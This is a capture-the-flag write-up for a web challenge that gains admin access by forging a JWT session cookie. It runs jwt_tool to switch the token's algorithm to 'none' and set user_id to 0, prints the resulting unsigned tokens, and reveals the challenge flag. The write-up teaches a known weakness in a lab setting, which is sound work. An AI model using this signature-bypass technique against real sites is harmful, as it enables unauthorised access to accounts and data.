Category
Web
Description
I found a page that only the site admins can access. Can you break into it?
Solution
Entering the page we get a Authentication required. message.
Checking the cookies we find a JWT-token in the cookie named session.
Taking a look at the payload of the JWT-token we see that it’s a user id value.
{
"user_id": -1
}
Lets try using jwt_tool to change the alg to None and the user_id to 0 and see if we can get access.
jwt_tool eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjotMX0.KYcUKjfqhf6wTJo15Bj445WkN5Y7Fr_12Vk2q-ce87c -pc user_id -pv 0 -X a -I
jwttool_773c47463a838e39a1698e144ca13a3f - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VyX2lkIjowfQ.
jwttool_077eddfda5fa95fc3970229ceb08c087 - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJ0eXAiOiJKV1QiLCJhbGciOiJOb25lIn0.eyJ1c2VyX2lkIjowfQ.
jwttool_b94e04df39b3c3e6314e4b01498ba1e2 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0.eyJ1c2VyX2lkIjowfQ.
jwttool_6198faea114a254b28c95305d2aed744 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJ0eXAiOiJKV1QiLCJhbGciOiJuT25FIn0.eyJ1c2VyX2lkIjowfQ.
Using the new token grants us acces and we get the flag.
ASV{n0_s1gn@tur3_r3qu1r3d}